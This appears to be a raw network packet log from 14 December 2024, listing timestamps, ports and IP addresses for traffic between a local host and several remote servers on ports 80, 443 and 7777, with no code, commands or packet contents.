Dec 14, 2024 23:58:30.179651976 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.180473089 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.180608034 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.180619955 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.180681944 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.181518078 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.181685925 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.181751966 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.182564020 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.182620049 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.182871103 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.182954073 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.183537960 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.183598995 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.321773052 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.321855068 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.321916103 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.322228909 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.322344065 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.322391987 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.323246956 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.323287010 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.323399067 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.323501110 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.324321032 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.324363947 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.324439049 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.324608088 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.325324059 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:30.325372934 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:30.413414955 CET	7777	49824	87.120.127.228	192.168.2.4
Dec 14, 2024 23:58:30.417398930 CET	49824	7777	192.168.2.4	87.120.127.228
Dec 14, 2024 23:58:30.537204981 CET	7777	49824	87.120.127.228	192.168.2.4
Dec 14, 2024 23:58:30.806950092 CET	7777	49824	87.120.127.228	192.168.2.4
Dec 14, 2024 23:58:30.863068104 CET	49824	7777	192.168.2.4	87.120.127.228
Dec 14, 2024 23:58:32.069423914 CET	49824	7777	192.168.2.4	87.120.127.228
Dec 14, 2024 23:58:32.189182043 CET	7777	49824	87.120.127.228	192.168.2.4
Dec 14, 2024 23:58:32.189359903 CET	49824	7777	192.168.2.4	87.120.127.228
Dec 14, 2024 23:58:32.309191942 CET	7777	49824	87.120.127.228	192.168.2.4
Dec 14, 2024 23:58:33.176028013 CET	49811	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:33.176297903 CET	49835	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:33.296272039 CET	80	49835	185.215.113.43	192.168.2.4
Dec 14, 2024 23:58:33.296355963 CET	80	49811	185.215.113.43	192.168.2.4
Dec 14, 2024 23:58:33.296586037 CET	49811	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:33.296628952 CET	49835	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:33.297058105 CET	49835	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:33.416836977 CET	80	49835	185.215.113.43	192.168.2.4
Dec 14, 2024 23:58:34.649131060 CET	80	49835	185.215.113.43	192.168.2.4
Dec 14, 2024 23:58:34.649188995 CET	49835	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:34.654707909 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:34.655946016 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:34.774933100 CET	80	49813	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:34.775028944 CET	49813	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:34.775626898 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:34.775696993 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:34.801881075 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:34.921713114 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:35.498024940 CET	49842	443	192.168.2.4	104.21.50.161
Dec 14, 2024 23:58:35.498109102 CET	443	49842	104.21.50.161	192.168.2.4
Dec 14, 2024 23:58:35.498208046 CET	49842	443	192.168.2.4	104.21.50.161
Dec 14, 2024 23:58:35.499233961 CET	49842	443	192.168.2.4	104.21.50.161
Dec 14, 2024 23:58:35.499275923 CET	443	49842	104.21.50.161	192.168.2.4
Dec 14, 2024 23:58:36.118057013 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.118110895 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.118146896 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.118246078 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.118246078 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.118246078 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.118518114 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.118552923 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.118587017 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.118602991 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.118635893 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.119296074 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.119349003 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.119381905 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.119405985 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.119405985 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.119494915 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.119942904 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.120114088 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.238369942 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.238405943 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.238523960 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.238523960 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.309899092 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.310002089 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.310080051 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.310081005 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.314071894 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.314220905 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.314269066 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.314349890 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.322510004 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.322649956 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.322663069 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.322839022 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.330856085 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.330943108 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.330975056 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.331017971 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.339294910 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.339449883 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.339457035 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.339548111 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.347656012 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.347795010 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.347801924 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.347891092 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.356060982 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.356210947 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.356259108 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.356590986 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.364409924 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.364495993 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.364536047 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.364727974 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.372786999 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.372908115 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.373070955 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.373070955 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.381211996 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.381272078 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.381288052 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.381352901 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.388797998 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.388875008 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.388969898 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.388969898 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.502537966 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.502666950 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.502697945 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.502836943 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.505017996 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.505136967 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.505178928 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.505179882 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.510174990 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.510317087 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.510327101 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.510417938 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.515022039 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.515144110 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.515182018 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.515261889 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.520061970 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.520117044 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.520132065 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.520221949 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.524807930 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.524943113 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.524983883 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.525048971 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.529674053 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.529732943 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.529846907 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.530180931 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.534384012 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.534564972 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.534626007 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.539223909 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.539345980 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.539410114 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.544009924 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.544181108 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.544245958 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.548804045 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.548922062 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.548983097 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.553615093 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.553723097 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.553807020 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.558382988 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.558526039 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.558594942 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.563168049 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.563287020 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.563355923 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.567987919 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.568092108 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.568171024 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.572685003 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.573492050 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.694495916 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.694571018 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.694606066 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.694684982 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.695686102 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.695825100 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.695858002 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.695936918 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.699903011 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.700009108 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.700064898 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.700113058 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.704073906 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.704154015 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.704246998 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.708220005 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.708395004 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.708476067 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.712412119 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.712517977 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.712587118 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.716557980 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.716743946 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.716953993 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.720741034 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.720859051 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.721026897 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.724932909 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.724986076 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.725116014 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.725186110 CET	443	49842	104.21.50.161	192.168.2.4
Dec 14, 2024 23:58:36.725255966 CET	49842	443	192.168.2.4	104.21.50.161
Dec 14, 2024 23:58:36.729077101 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.729180098 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.729248047 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.733222008 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.733377934 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.733573914 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.737397909 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.737518072 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.737586975 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.737586975 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.741568089 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.741669893 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.741749048 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.745719910 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.745853901 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.745917082 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.749914885 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.750009060 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.750087976 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.754057884 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.754211903 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.754287958 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.758336067 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.758471012 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.758546114 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.762397051 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.762582064 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.762768030 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.766488075 CET	49842	443	192.168.2.4	104.21.50.161
Dec 14, 2024 23:58:36.766565084 CET	443	49842	104.21.50.161	192.168.2.4
Dec 14, 2024 23:58:36.766575098 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.766637087 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.766701937 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.766881943 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.767633915 CET	443	49842	104.21.50.161	192.168.2.4
Dec 14, 2024 23:58:36.770792007 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.770867109 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.770961046 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.774939060 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.777651072 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.815922022 CET	49842	443	192.168.2.4	104.21.50.161
Dec 14, 2024 23:58:36.886647940 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.886756897 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.886848927 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.886848927 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.888369083 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.888545036 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.889070034 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.889117002 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.889194012 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.889242887 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.892718077 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.892826080 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.892885923 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.892885923 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.896317005 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.896492004 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.896557093 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.896631002 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.899893045 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.900065899 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.900084972 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.900181055 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.903367043 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.903425932 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.903487921 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.903534889 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.906745911 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.906872034 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.906903982 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.906985998 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.910159111 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.910305977 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.910309076 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.910396099 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.913655996 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.913743973 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.913839102 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.913839102 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.917049885 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.917208910 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.917298079 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.917342901 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.920520067 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.920631886 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.920677900 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.920677900 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.923943996 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.924056053 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.924099922 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.924101114 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.927345991 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.927448034 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.927618980 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.927670956 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.930808067 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.930957079 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.930983067 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.931073904 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.934339046 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.934439898 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.934506893 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.934506893 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.937647104 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.937782049 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.937791109 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.937880039 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.941103935 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.941246986 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.941251040 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.941382885 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.944756031 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.944830894 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.944880009 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.944880009 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.947973967 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.948132992 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.948183060 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.948227882 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.951406002 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.951476097 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.951534986 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.951590061 CET	49841	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:36.954952002 CET	80	49841	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:36.955004930 CET	80	49841	185.215.113.16	192.168.2.4
